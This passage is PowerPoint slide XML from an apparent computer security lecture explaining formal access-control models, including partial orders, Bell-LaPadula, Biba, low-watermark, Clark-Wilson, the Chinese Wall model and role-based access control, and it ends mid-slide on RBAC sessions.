              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Totality: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If x and y are in U, then x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> y or y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> x.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>All of the usual definitions of “less than or equal to” for numbers, such as integers and real numbers, are total orders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If we drop the requirement of totality, we get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>partial order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The classic example of a partial order is the set of courses taught at a college or university, where we say that, for two courses A and B, A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  B, if A is a prerequisite for B.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}"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BLP Model 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security levels in BLP form a partial order, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each object, x, is assigned to a security level, L(x). Similarly, each user, u, is assigned to a security level, L(u). Access to objects by users is controlled by the following two rules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple security property. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A user u can read an object x only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 				L(x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> L(u).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>*-property. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A user u can write (create, edit, or append to) an object x only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				L(u) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> L(x).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simple security property is also called the “no read up” rule, as it prevents users from viewing objects with security levels higher than their own. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The *-property is also called the “no write down” rule. It is meant to prevent propagation of information to users with a lower security level.</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Security Levels Using Categories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13</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1676400" y="1828800"/>
            <a:ext cx="6103266"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Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8382000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has a similar structure to the BLP model, but it addresses integrity rather than confidentiality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objects and users are assigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>integrity levels </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that form a partial order, similar to the BLP model. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The integrity levels in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> model indicate degrees of trustworthiness, or accuracy, for objects and users, rather than levels for determining confidentiality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, a file stored on a machine in a closely monitored data center would be assigned a higher integrity level than a file stored on a laptop.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In general, a data-center computer is less likely to be compromised than a random laptop computer. Likewise, when it comes to users, a senior employee with years of experience would have a higher integrity level than an intern.</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Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Model Rules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8382000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The access-control rules for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are the reverse of those for BLP. That is, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> does not allow reading from lower levels and writing to upper levels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If we let I(u) denote the integrity level of a user u and I(x) denote the integrity level for an object, x, we have the following rules in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> model:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> A user u can read an object x only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				I(u) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> I(x).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> A user u can write (create, edit or append to) an object x only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>				I(x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> I(u).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thus, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> rules express the principle that information can only flow down, going from higher integrity levels to lower integrity levels.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Low-Watermark Model</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b="1" dirty="0" smtClean="0"/>
              <a:t>low-watermark model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is an extension to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> model that relaxes the “no read down” restriction, but is otherwise similar to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> model. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In other words, users with higher integrity levels can read objects with lower integrity levels. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After such a reading, the user performing the reading is demoted such that his integrity level matches that of the read object.</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Clark-Wilson Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rather than dealing with document confidentiality and/or integrity, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Clark-Wilson (CW) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>model deals with systems that perform transactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It describes mechanisms for assuring that the integrity of such a system is preserved across the execution of a transaction. Key components of the CW model include the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Integrity constraints </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that express relationships among objects that must be satisfied for the system state to be valid. A classic example of an integrity constraint is the relationship stating that the final balance of a bank account after a withdrawal transaction must be equal to the initial balance minus the amount withdrawn.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Certification methods </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that verify that transactions meet given integrity constraints. Once the program for a transaction is certified, the integrity constraints do not need to be verified at each execution of the transaction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Separation of duty rules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that prevent a user that executes transaction from certifying it. In general, each transaction is assigned disjoint sets of users that can certify and execute it, respectively.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF99276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Chinese Wall Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8382000" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Brewer and Nash model, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>commonly referred to as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Chinese wall model, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is designed for use in the commercial sector to eliminate the possibility of conflicts of interest. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To achieve this, the model groups resources into “conflict of interest classes.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The model enforces the restriction that each user can only access one resource from each conflict of interest class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>In the financial world, such a model might be used, for instance, to prevent market analysts from receiving insider information from one company and using that information to provide advice to that company’s competitor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Such a policy might be implemented on computer systems to regulate users’ access to sensitive or proprietary data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF99276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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8382000" cy="2514600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>role-based access control (RBAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>model can be viewed as an evolution of the notion of group-based permissions in file systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An RBAC system is defined with respect to an organization, such as company, a set of resources, such as documents, print services, and network services, and a set of users, such as employees, suppliers, and customers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</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2971799" y="3733800"/>
            <a:ext cx="3843363" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="6553200"/>
            <a:ext cx="1763624" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
              <a:t>U.S. Navy image in the public domain.</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Security Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8458200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>security  policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a well-defined set of rules that include the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subjects:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the agents who interact with the system, which could be defined in terms of specific individuals or in terms of roles or ranks that groups of individuals might hold within an organization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Individuals could be identified by their names or by their job titles, like President, CEO, or CFO. Groups could be defined using terms such as users, administrators, generals, majors, faculty, deans, managers, and administrative assistants. This category also includes outsiders, such as attackers and guests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objects:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the informational and computational resources that a security policy is designed to protect and manage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples include critical documents, files, and databases, and computational resources include servers, workstations, and software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the things that subjects may or may not do with respect to the objects. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples include the reading and writing of documents, updating software on a web server, and accessing the contents of a database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Permissions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mappings between subjects, actions, and objects, which clearly state what kinds of actions are allowed or disallowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protections:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the specific security features or rules that are included in the policy to help achieve particular security goals, such as confidentiality, integrity, availability, or anonymity.</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dirty="0" smtClean="0"/>
              <a:t>RBAC Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="990600"/>
            <a:ext cx="8763000" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>is an entity that wishes to access resources of the organization to perform a task. Usually, users are actual human users, but a user can also be a machine or application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>is defined as a collection of users with similar functions and responsibilities in the organization. Examples of roles in a university may include “student,” “alum,” “faculty,” “dean,” “staff,” and “contractor.” In general, a user may have multiple roles. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Roles and their functions are often specified in the written documents of the organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>The assignment of users to roles follows resolutions by the organization, such as employment actions (e.g., hiring and resignation) and academic actions (e.g., admission and graduation).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>permission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>describes an allowed method of access to a resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>More specifically, a permission consists of an operation performed on an object, such as “read a file” or “open a network connection.” Each role has an associated set of permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
